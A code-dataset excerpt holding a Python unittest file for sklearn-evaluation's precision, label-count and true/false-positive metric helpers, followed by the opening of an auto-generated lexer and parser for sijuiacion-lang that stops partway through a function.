86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | 1
|
2019-04-22T16:39:56.000Z
|
2019-04-22T16:39:56.000Z
|
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | null | null | null |
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
86ff18d9e2057628bca83d70d81267036abce90e
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from sklearn_evaluation.metrics import (precision_at, labels_at,
tp_at, fp_at)
from sklearn_evaluation.metrics import __threshold_at as threshold_at
from sklearn_evaluation.metrics import __binarize_scores_at as binarize_scores_at
import numpy as np
from numpy import nan
from random import shuffle
class Test_threshold_at(TestCase):
def setUp(self):
self.scores = np.array(
[1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
shuffle(self.scores)
def test_at_10(self):
threshold = threshold_at(self.scores, 0.1)
self.assertEqual(threshold, 1.0)
def test_at_50(self):
threshold = threshold_at(self.scores, 0.5)
self.assertEqual(threshold, 0.6)
def test_at_100(self):
threshold = threshold_at(self.scores, 1.0)
self.assertEqual(threshold, 0.1)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, threshold_at, self.scores, -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(
ValueError, threshold_at, self.scores, proportion=1.1)
class Test_binarize_scores_at(TestCase):
def setUp(self):
self.scores = np.array(
[1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
def test_at_10(self):
binary_scores = binarize_scores_at(self.scores, 0.1)
expected = np.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
np.testing.assert_equal(binary_scores, expected)
def test_at_50(self):
binary_scores = binarize_scores_at(self.scores, 0.5)
expected = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
np.testing.assert_equal(binary_scores, expected)
def test_at_100(self):
binary_scores = binarize_scores_at(self.scores, 1.0)
expected = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
np.testing.assert_equal(binary_scores, expected)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, binarize_scores_at, self.scores, -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(
ValueError, binarize_scores_at, self.scores, proportion=1.1)
class Test_precision_at(TestCase):
def test_perfect_precision(self):
labels = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
scores = np.array([100, 90, 80, 70, 60, 50, 40, 30, 20, 10])
prec, cutoff = precision_at(labels, scores, proportion=0.10)
self.assertEqual(prec, 1.0)
self.assertEqual(cutoff, 100)
def test_perfect_precision_with_nas(self):
labels = np.array([1, nan, 1, 1, 1, nan, 0, 0, 0, 0])
scores = np.array([100, 90, 80, 70, 60, 50, 40, 30, 20, 10])
prec, cutoff = precision_at(
labels, scores, proportion=0.10, ignore_nas=True)
self.assertEqual(prec, 1.0)
self.assertEqual(cutoff, 100)
def test_baseline_precision(self):
labels = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
scores = np.array([100, 90, 80, 70, 60, 50, 40, 30, 20, 10])
prec, cutoff = precision_at(labels, scores, proportion=1.0)
self.assertEqual(prec, 0.5)
self.assertEqual(cutoff, 10)
def test_baseline_precision_with_nas(self):
labels = np.array([nan, 1, nan, 1, 1, nan, nan, 0, 0, 0])
scores = np.array([100, 90, 80, 70, 60, 50, 40, 30, 20, 10])
prec, cutoff = precision_at(
labels, scores, proportion=1.0, ignore_nas=True)
self.assertEqual(prec, 0.5)
self.assertEqual(cutoff, 10)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, precision_at, [1], [0], -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(ValueError, precision_at, [1], [0], proportion=1.1)
class Test_labels_at(TestCase):
def test_no_labels_at_1(self):
y_true = np.array([nan, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.random.rand(1, 10)
labels = labels_at(y_true, y_score, proportion=0.01, normalize=False)
self.assertEqual(labels, 0)
def test_no_labels_at_50(self):
y_true = np.array([nan, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.random.rand(1, 10)
labels = labels_at(y_true, y_score, proportion=0.5, normalize=False)
self.assertEqual(labels, 0)
def test_no_labels_at_100(self):
y_true = np.array([nan, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.random.rand(1, 10)
labels = labels_at(y_true, y_score, proportion=1.0, normalize=False)
self.assertEqual(labels, 0)
def test_one_label_at_10(self):
y_true = np.array([1, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.1, normalize=False)
self.assertEqual(labels, 1)
def test_one_label_at_10_norm(self):
y_true = np.array([1, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.1, normalize=True)
self.assertEqual(labels, 1.0)
def test_one_label_at_50(self):
y_true = np.array([1, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.5, normalize=False)
self.assertEqual(labels, 1)
def test_one_label_at_100(self):
y_true = np.array([1, nan, nan, nan, nan, nan, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=1.0, normalize=False)
self.assertEqual(labels, 1)
def test_60_labels_at_60(self):
y_true = np.array([1, 1, 1, 1, 1, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.6, normalize=False)
self.assertEqual(labels, 6)
def test_60_labels_at_60_norm(self):
y_true = np.array([1, 1, 1, 1, 1, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.6, normalize=True)
self.assertEqual(labels, 1.0)
def test_60_labels_at_60_mixed_values(self):
y_true = np.array([1, 0, 0, 1, 0, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.6, normalize=False)
self.assertEqual(labels, 6)
def test_60_labels_at_60_norm_mixed_values(self):
y_true = np.array([0, 0, 0, 1, 0, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.6, normalize=True)
self.assertEqual(labels, 1.0)
def test_60_labels_at_30(self):
y_true = np.array([1, 1, 1, 1, 1, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.3, normalize=False)
self.assertEqual(labels, 3)
def test_60_labels_at_30_norm(self):
y_true = np.array([1, 1, 1, 1, 1, 1, nan, nan, nan, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
labels = labels_at(y_true, y_score, proportion=0.3, normalize=True)
self.assertEqual(labels, 0.5)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, labels_at, [1], [0], -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(ValueError, labels_at, [1], [0], proportion=1.1)
class Test_tp_at(TestCase):
def test_with_nas(self):
y_true = np.array([1, nan, 1, 1, 1, 1, 1, 1, 1, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.1)
self.assertEqual(tps, 1)
def test_all_tp_at_10(self):
y_true = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.1)
self.assertEqual(tps, 1)
def test_all_tp_at_50(self):
y_true = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.5)
self.assertEqual(tps, 5)
def test_all_tp_at_100(self):
y_true = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=1.0)
self.assertEqual(tps, 10)
def test_no_tp_at_50(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.5)
self.assertEqual(tps, 0)
def test_no_tp_at_100(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=1.0)
self.assertEqual(tps, 0)
def test_some_tp_at_10(self):
y_true = np.array([1, 0, 0, 0, 0, 0, 0, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.1)
self.assertEqual(tps, 1)
def test_some_tp_at_50(self):
y_true = np.array([1, 1, 0, 0, 1, 0, 0, 1, 1, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=0.5)
self.assertEqual(tps, 3)
def test_some_tp_at_100(self):
y_true = np.array([0, 0, 0, 0, 1, 0, 0, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
tps = tp_at(y_true, y_score, proportion=1.0)
self.assertEqual(tps, 4)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, tp_at, [1], [0], -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(ValueError, tp_at, [1], [0], proportion=1.1)
class Test_fp_at(TestCase):
def test_with_nas(self):
y_true = np.array([0, nan, 1, 1, 1, 1, 1, 1, 1, nan])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.1)
self.assertEqual(fps, 1)
def test_all_fp_at_10(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.1)
self.assertEqual(fps, 1)
def test_all_fp_at_50(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.5)
self.assertEqual(fps, 5)
def test_all_fp_at_100(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=1.0)
self.assertEqual(fps, 10)
def test_no_fp_at_50(self):
y_true = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.5)
self.assertEqual(fps, 0)
def test_no_fp_at_100(self):
y_true = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=1.0)
self.assertEqual(fps, 0)
def test_some_fp_at_10(self):
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.1)
self.assertEqual(fps, 1)
def test_some_fp_at_50(self):
y_true = np.array([1, 1, 0, 0, 1, 0, 0, 1, 1, 0])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=0.5)
self.assertEqual(fps, 2)
def test_some_fp_at_100(self):
y_true = np.array([0, 0, 0, 0, 1, 0, 0, 1, 1, 1])
y_score = np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])
fps = fp_at(y_true, y_score, proportion=1.0)
self.assertEqual(fps, 6)
def test_proportion_less_than_zero(self):
self.assertRaises(ValueError, fp_at, [1], [0], -0.1)
def test_proportion_more_than_one(self):
self.assertRaises(ValueError, fp_at, [1], [0], proportion=1.1)
| 40.99373
| 81
| 0.584002
| 2,510
| 13,077
| 2.874104
| 0.033466
| 0.03715
| 0.034516
| 0.034932
| 0.943721
| 0.910452
| 0.878431
| 0.854034
| 0.810507
| 0.777655
| 0
| 0.126518
| 0.244475
| 13,077
| 318
| 82
| 41.122642
| 0.603644
| 0
| 0
| 0.598394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228916
| 1
| 0.220884
| false
| 0
| 0.028112
| 0
| 0.273092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a142384310a68db7dae77c0e7eabc09efec8d874
| 162,170
|
py
|
Python
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 21
|
2019-10-13T14:11:32.000Z
|
2021-12-14T02:42:12.000Z
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 1
|
2020-01-07T13:14:46.000Z
|
2020-01-09T16:58:07.000Z
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 1
|
2020-08-13T16:17:09.000Z
|
2020-08-13T16:17:09.000Z
|
# this file is auto-generated by RBNF.hs and the Python package rbnf-rts
from rbnf_rts.rbnf_linker import link
from rbnf_rts.utils import ImmutableMap
from rbnf_rts.lexical import *
__all__ = ['lexicals', 'run_lexer', 'mk_parser']
(lexicals, run_lexer) = lexer(r(PY='#([^\\\\#]+|\\\\.)*?#'), r(INT='\\d+'), r(ID='[-$\\.a-zA-Z_\\u4e00-\\u9fa5][\\-\\!-$\\.a-zA-Z0-9_\\u4e00-\\u9fa5]*'), r(STRING='"([^\\\\"]+|\\\\.)*?"'), r(W='\\s+'), l['}'], l['|'], l['{'], l[']'], l['['], l['=>'], ignores=['W'], reserved_map=ImmutableMap.from_dict({'runtime': 'quote runtime', 'load': 'quote load', 'store': 'quote store', 'deref': 'quote deref', 'deref!': 'quote deref!', 'const': 'quote const', 'extern': 'quote extern', 'glob': 'quote glob', 'print': 'quote print', 'pop': 'quote pop', 'prj': 'quote prj', 'prj!': 'quote prj!', 'indir': 'quote indir', 'rot': 'quote rot', 'dup': 'quote dup', 'goto': 'quote goto', 'goto-if': 'quote goto-if', 'goto-if-not': 'quote goto-if-not', 'label': 'quote label', 'blockaddr': 'quote blockaddr', 'call': 'quote call', 'list': 'quote list', 'tuple': 'quote tuple', 'return': 'quote return', 'line': 'quote line', 'defun': 'quote defun', '{': 'quote {', '}': 'quote }', 'switch': 'quote switch', '|': 'quote |', '=>': 'quote =>', '_': 'quote _', 'document': 'quote document', 'filename': 'quote filename', 'free': 'quote free', 'name': 'quote name', 'args': 'quote args', 'firstlineno': 'quote firstlineno', '[': 'quote [', ']': 'quote ]'}), numbering={'BOF': 0, 'EOF': 1, 'quote runtime': 2, 'quote load': 3, 'quote store': 4, 'quote deref': 5, 'quote deref!': 6, 'quote const': 7, 'quote extern': 8, 'quote glob': 9, 'quote print': 10, 'quote pop': 11, 'quote prj': 12, 'quote prj!': 13, 'quote indir': 14, 'quote rot': 15, 'quote dup': 16, 'quote goto': 17, 'quote goto-if': 18, 'quote goto-if-not': 19, 'quote label': 20, 'quote blockaddr': 21, 'quote call': 22, 'quote list': 23, 'quote tuple': 24, 'quote return': 25, 'quote line': 26, 'quote defun': 27, 'quote {': 28, 'quote }': 29, 'quote switch': 30, 'quote |': 31, 'quote =>': 32, 'quote _': 33, 'quote document': 34, 'quote filename': 35, 'quote free': 36, 'quote name': 37, 'quote args': 38, 'quote firstlineno': 39, 'quote [': 40, 'quote ]': 41, 'PY': 42, 'INT': 43, 'ID': 44, 'STRING': 45, 'W': 46})
def mk_parser():
from rbnf_rts.rts import AST as prim__mk__ast, Cons as prim__cons, _nil as prim__nil
def lr_step_Attrs(_slot_0, prim__state, prim__tokens):
lcl_0 = parse_Attr(prim__state, prim__tokens)
_slot_1_check = lcl_0
lcl_0 = _slot_1_check[0]
lcl_0 = (lcl_0 is False)
if lcl_0:
lcl_0 = _slot_1_check
else:
lcl_1 = _slot_1_check[1]
lcl_1 = lcl_1
_slot_1 = lcl_1
lcl_1 = (_slot_0, _slot_1)
lcl_1 = prim__mk__ast('Attrs', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = (True, _slot_local__1)
lcl_0 = lcl_1
return lcl_0
def lr_loop_Attrs(_slot_0, prim__state, prim__tokens):
lr_Attrs_reduce = _slot_0
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = lr_step_Attrs(lr_Attrs_reduce, prim__state, prim__tokens)
lr_Attrs_try = lcl_0
lcl_0 = lr_Attrs_try[0]
lcl_0 = (lcl_0 is not False)
while lcl_0:
lcl_1 = prim__tokens.offset
_off_0 = lcl_1
lcl_1 = lr_Attrs_try[1]
lcl_1 = lcl_1
lr_Attrs_reduce = lcl_1
lcl_1 = lr_step_Attrs(lr_Attrs_reduce, prim__state, prim__tokens)
lr_Attrs_try = lcl_1
lcl_1 = lr_Attrs_try[0]
lcl_1 = (lcl_1 is not False)
lcl_0 = lcl_1
lcl_0 = prim__tokens.offset
lcl_0 = (lcl_0 is _off_0)
if lcl_0:
lcl_1 = (True, lr_Attrs_reduce)
lcl_0 = lcl_1
else:
lcl_0 = lr_Attrs_try
return lcl_0
def lr_step_IDList(_slot_0, prim__state, prim__tokens):
lcl_0 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_1 = lcl_0
lcl_0 = (_slot_1 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'ID not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = (_slot_0, _slot_1)
lcl_1 = prim__mk__ast('IDList', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = (True, _slot_local__1)
lcl_0 = lcl_1
return lcl_0
def lr_loop_IDList(_slot_0, prim__state, prim__tokens):
lr_IDList_reduce = _slot_0
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = lr_step_IDList(lr_IDList_reduce, prim__state, prim__tokens)
lr_IDList_try = lcl_0
lcl_0 = lr_IDList_try[0]
lcl_0 = (lcl_0 is not False)
while lcl_0:
lcl_1 = prim__tokens.offset
_off_0 = lcl_1
lcl_1 = lr_IDList_try[1]
lcl_1 = lcl_1
lr_IDList_reduce = lcl_1
lcl_1 = lr_step_IDList(lr_IDList_reduce, prim__state, prim__tokens)
lr_IDList_try = lcl_1
lcl_1 = lr_IDList_try[0]
lcl_1 = (lcl_1 is not False)
lcl_0 = lcl_1
lcl_0 = prim__tokens.offset
lcl_0 = (lcl_0 is _off_0)
if lcl_0:
lcl_1 = (True, lr_IDList_reduce)
lcl_0 = lcl_1
else:
lcl_0 = lr_IDList_try
return lcl_0
def lr_step_Instrs(_slot_0, prim__state, prim__tokens):
lcl_0 = parse_Instr(prim__state, prim__tokens)
_slot_1_check = lcl_0
lcl_0 = _slot_1_check[0]
lcl_0 = (lcl_0 is False)
if lcl_0:
lcl_0 = _slot_1_check
else:
lcl_1 = _slot_1_check[1]
lcl_1 = lcl_1
_slot_1 = lcl_1
lcl_1 = (_slot_0, _slot_1)
lcl_1 = prim__mk__ast('Instrs', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = (True, _slot_local__1)
lcl_0 = lcl_1
return lcl_0
def lr_loop_Instrs(_slot_0, prim__state, prim__tokens):
lr_Instrs_reduce = _slot_0
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = lr_step_Instrs(lr_Instrs_reduce, prim__state, prim__tokens)
lr_Instrs_try = lcl_0
lcl_0 = lr_Instrs_try[0]
lcl_0 = (lcl_0 is not False)
while lcl_0:
lcl_1 = prim__tokens.offset
_off_0 = lcl_1
lcl_1 = lr_Instrs_try[1]
lcl_1 = lcl_1
lr_Instrs_reduce = lcl_1
lcl_1 = lr_step_Instrs(lr_Instrs_reduce, prim__state, prim__tokens)
lr_Instrs_try = lcl_1
lcl_1 = lr_Instrs_try[0]
lcl_1 = (lcl_1 is not False)
lcl_0 = lcl_1
lcl_0 = prim__tokens.offset
lcl_0 = (lcl_0 is _off_0)
if lcl_0:
lcl_1 = (True, lr_Instrs_reduce)
lcl_0 = lcl_1
else:
lcl_0 = lr_Instrs_try
return lcl_0
def lr_step_JumpCases(_slot_0, prim__state, prim__tokens):
lcl_0 = 31
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_1 = lcl_0
lcl_0 = (_slot_1 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'quote | not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = (_slot_0, _slot_1)
_slot_local__1 = lcl_1
lcl_1 = parse_JumpCase(prim__state, prim__tokens)
_slot_2_check = lcl_1
lcl_1 = _slot_2_check[0]
lcl_1 = (lcl_1 is False)
if lcl_1:
lcl_1 = _slot_2_check
else:
lcl_2 = _slot_2_check[1]
lcl_2 = lcl_2
_slot_2 = lcl_2
lcl_2 = (_slot_local__1, _slot_2)
lcl_2 = prim__mk__ast('JumpCases', lcl_2)
_slot_local__2 = lcl_2
lcl_2 = (True, _slot_local__2)
lcl_1 = lcl_2
lcl_0 = lcl_1
return lcl_0
def lr_loop_JumpCases(_slot_0, prim__state, prim__tokens):
lr_JumpCases_reduce = _slot_0
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = lr_step_JumpCases(lr_JumpCases_reduce, prim__state, prim__tokens)
lr_JumpCases_try = lcl_0
lcl_0 = lr_JumpCases_try[0]
lcl_0 = (lcl_0 is not False)
while lcl_0:
lcl_1 = prim__tokens.offset
_off_0 = lcl_1
lcl_1 = lr_JumpCases_try[1]
lcl_1 = lcl_1
lr_JumpCases_reduce = lcl_1
lcl_1 = lr_step_JumpCases(lr_JumpCases_reduce, prim__state, prim__tokens)
lr_JumpCases_try = lcl_1
lcl_1 = lr_JumpCases_try[0]
lcl_1 = (lcl_1 is not False)
lcl_0 = lcl_1
lcl_0 = prim__tokens.offset
lcl_0 = (lcl_0 is _off_0)
if lcl_0:
lcl_1 = (True, lr_JumpCases_reduce)
lcl_0 = lcl_1
else:
lcl_0 = lr_JumpCases_try
return lcl_0
def parse_Attr(prim__state, prim__tokens):
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_0:
lcl_2 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_2 = lcl_2.idint
if (lcl_2 == 37):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 45
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'STRING not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 36):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = parse_IDs(prim__state, prim__tokens)
_slot_1_check = lcl_3
lcl_3 = _slot_1_check[0]
lcl_3 = (lcl_3 is False)
if lcl_3:
lcl_3 = _slot_1_check
else:
lcl_4 = _slot_1_check[1]
lcl_4 = lcl_4
_slot_1 = lcl_4
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 39):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 35):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 45
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'STRING not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 34):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 45
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'STRING not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Attr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 38):
